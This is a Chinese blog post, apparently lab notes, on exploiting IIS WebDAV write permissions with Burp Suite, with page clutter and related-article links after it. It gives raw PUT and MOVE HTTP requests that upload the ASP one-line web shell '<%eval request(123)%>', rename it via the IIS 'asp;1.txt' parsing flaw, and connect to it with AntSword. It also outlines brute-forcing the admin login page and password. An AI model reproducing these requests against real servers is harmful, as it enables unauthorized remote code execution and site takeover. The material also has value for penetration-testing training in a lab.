Burp、awvs基础

最新推荐文章于 2024-04-27 11:49:36 发布
最新推荐文章于 2024-04-27 11:49:36 发布
阅读量508 收藏 1
点赞数
分类专栏: burp基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45405155/article/details/111874056
版权

Burp、awvs基础

1.开启webdav利用iis写入权限

在这里插入图片描述
开启文件的脚本权限,读写权限
在这里插入图片描述

2、利用burp抓包上传木马

http请求方法:
GET、POST、PUT(上传)、MOVE(移动、重命名)、COPY(复制)、DELETE(删除)、LOCK(锁)
抓包
在这里插入图片描述
利用PUT上传木马文件

<%eval request(123)%>

PUT /abc1.txt http/1.1
HOST:192.168.8.129

11111111111111111111111111111
<%eval request(123)%>

在这里插入图片描述
利用MOVE对上传文件后缀进行重写

1、利用iis解析漏洞

将abc1.txt转移(重命名)abc1.asp;1.txt

MOVE /abc1.txt http/1.1
Host: 192.168.8.129
Destination: http://192.168.8.129/abc1.asp;1.txt

111111111111111111111111111111111111111
<%eval request(123)%>

在这里插入图片描述
解析 http://192.168.8.129/abc1.asp;1.txt
在这里插入图片描述
用蚁剑对其进行连接
在这里插入图片描述
2、利用脚本解析
利用PUT重新上传木马文件abc2.txt在这里插入图片描述
利用MOEV重命名abc2.txt->abc2.asp

MOVE /abc2.txt http/1.1
Host: 192.168.8.129
Destination: http://192.168.8.129/abc2.asp

22222222222222222222222222222222
<%eval request(123)%>

在这里插入图片描述蚁剑连接

在这里插入图片描述

3、利用burp对网站后台和后台密码进行爆破

1、对网站进行后台爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
访问http://192.168.8.129/admin/admin
出现错误
在这里插入图片描述
访问http:192.168.8.129/admin/login.asp成功

在这里插入图片描述
2、对网站后台进行爆破
在这里插入图片描述
在这里插入图片描述
爆破得到密码为admin
在这里插入图片描述

追逐星星的boy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
awvs、xray、burp安装使用手册集合.doc
04-27
AWVS安装与使用】 Advanced Web Vulnerability Scanner (AWVS),是一款强大的自动化Web应用程序安全扫描工具,用于检测网站的安全漏洞。AWVS11的安装通常包括下载安装包、运行安装程序并按照向导进行操作。在使用...
Awvs+burp+xray,全自动漏洞探测
m0_60571990的博客
11-29 1175
Awvs+burp+xray,全自动漏洞探测
第72天:漏洞发现-Web框架中间件&联动&Goby&Afrog&Xray&Awvs&Vulmap
最新发布
weixin_71529930的博客
04-27 1728
Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描(挖洞)工具,PoC 涉及CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。实现对poc的在线编辑、管理、测试。这里一定要先点保存然后再扫描!
AWVS/Nessus/Burpsuite的简单使用
1stPeak's Blog
04-26 5085
1.AWVS:扫描网站漏洞 添加目标后进行自行设置,开始扫描 根据扫描到的漏洞等级进行利用,其他模块不建议使用,太繁琐,可用其他工具或网址替代 2.Nessus:扫描系统漏洞 开启nessus首先需要命令行输入/etc/init.d/nessusd start,开启nessus(Kali下) 之后输入https://127.0.0.1:8834进行访问(一定要是https) 3.Burpsuit...
AWVS扫描web站点
m0_61506558的博客
08-25 5635
AWVS扫描Web应用程序。
一键启动+AWVS+Sqlmap+BurpSutie+Xray多级代理联合挖洞
tangshuangsss的专栏
07-19 1926
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介最近在研究将多个工具联合在一起进行漏洞挖掘,提高挖洞效率,如AWVS+Sqlmap+BurpSutie+Xray进行联合,这样在使用web漏洞扫描的同时其他的几种工具也可以同步进行自动化漏洞挖掘。实战工具自行下载安装哈,可以直接找最新版本的:AWVS:web漏洞扫描工具Sqlmap:sql注...
BurpSuite依赖包
09-09
BurpSuite依赖包
Burp suite 免费版
08-23
集多种功能于一身的网络安全验究神器
Burp Suite Professional
01-04
Burp Suite Professional
Burpsuite 视频基础教程-9集.rar
05-24
好用的Burpsuite视频基础教程,教你零基础入门Burpsuite使用,整个视频一共包含9集,用普通视频播放器打开就可以播放;
AWVS扫描器扫描web漏洞操作
WQ_762的博客
08-06 4268
一,AWVS基础用法 1.1打开AWVS,在工具栏中New Scan按钮 1.2输入站点域名或者IP 1.3点击下一步,软件自动识别目标站点信息,也可以手动修改 1.4点击下一步,进入Crawling默认即可 1.5点击下一步,选择扫描模板,一般选择Default 1.6点击下一步,如果网站需要登录,就在此处添加登录信息 1.7点击下一步,再次进行信息确认,...
最全渗透测试工具讲解
08-31
渗透测试工具详解视频教程,该课程分为三个部分,1、针对web扫描工具介绍,2、针对抓包工具介绍,3、针对信息探测介绍。(没章节都会将该章节介绍的工具共享给大家)这三部分基本涵盖了渗透测试中百分之80常见工具的使用。让小白测试人员在面对一个web系统时有一个基本的思路,方便后续深入学习web渗透。
python3 Requests模板没有MOVE请求方法问题的解决
大方子
04-24 4811
使用Python编写IIS-PUT漏洞时,发现Requests没有MOVE请求方法 后来发现Requests模块的request方法是可以自定义请求方法的 下面就是利用request方法自定义MOVE请求方法 r = requests.request('MOVE', url=link + "/test.txt", headers={'Destination':link + "/shell.{0}".format(ext)}) ...
20210308 AWVS+BurpSuit+Nessus三种方式扫漏洞方法总结
qq_45290991的博客
03-09 3523
AWVS 我喜欢称之为“阿伟死了”,简单来说就是很难找到合适的破解版的东西,我是用虚拟机来的,基本用法就是: 有的网站需要登录,有的不需要,要登录的话自己注册一个账户,然后点击site login: 然后点击save,然后开始scan,一般默认就可以了 BurpSuit 这一个的原理是基于“我们访问一个站点就会有site map”在history里面: 1.浏览器开启代理配置相应的IP与端口 注意,,在“项目”的筛选面板中一定要选出适合出现的项目!而且bp是基于那种你必须点击很多.
常用wed扫描工具 awvs|appscan|Netsparker|Nessus
代码审计
04-08 4177
awvs 是一款知名的自动化网络漏洞扫描工具 功能介绍: 1.WebScanner:全站扫描,Web安全漏洞扫描 2.Site Crawler:爬虫功能,遍历站点目录结构 3.Target Finder:端口扫描,找出web服务器 4.Subdomain Scanner:子域名扫描器,利用DNS查询 5.Blind SQL Injector:盲注工具 6.HTTP Editor:http协议数据包编辑器 7.HTTP Sniffer:HTTP协议嗅探器 8.HTTP Fuzzer:模糊测试工具 9.Aut
Acunetix 11手动导入Burp suite抓取的网页
minxihou的博客
08-28 2704
前言 在我们使用Acunetix 11进行web网页漏洞扫描的时候,Acunetix会使用一个自带的爬虫脚本来爬取目标网页的目录结构。但是在进行安全扫描的时候有些target url因为安全策略的原因,自动爬虫并不能够完全的爬取到你想要的所有页面。这个时候不得不借助手动导入的功能来辅助实现爬取。 本片博客借助Burp site工具爬取目标站点的url并将其保存导入给AWVSAWVS会按照Bu...
AWVS-HTTP Fuzzer使用教程
W小哥
12-26 1464
第一步:把webshell放在phpstudy的WWW目录下 第二步,打开火狐浏览器,开启本地代理 第三步:打开webshell界面 第四步:打开AWVS抓包功能,抓取数据包 第五步:将红框中的IP地址导入都HTTP Fuzzer中 第六步:在HTTP Fuzzer中测试,添加字典 点击start开始 因为14844字节比前面的字节长,并且后面都是14844字节,那么密码就是4125...
对于crawlergo|rad|burpsuite|awvs爬虫的对比
01-26 3513
前言 最近在写代码,涉及了web爬取链接的方面,在百度过程中了解到了这篇文章:superSpider,突然就好奇平时常见的爬虫 工具和扫描器里的爬虫模块能力如何,所以来测试下。 主要测试1个自己手写的瞎眼爬虫,还有crawlergo、rad、burpsuite pro v202012、awvs 2019 文章里推荐的http://demo.aisec.cn/demo/站点打不开了所以就使用awvs的了; 测试站点:http://testphp.vulnweb.com 一 手写的基准爬虫 只抓取a
BurpSuite全攻略:从基础到实战详解
2. 第一章至第十六章详述了BurpSuite的基础安装和环境配置,包括代理设置、浏览器集成,以及各个组件如Burp Suite Proxy(代理)、Burp Target、Spider(爬虫)、Scanner(扫描器)、Intruder(攻击器)、Repeater...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值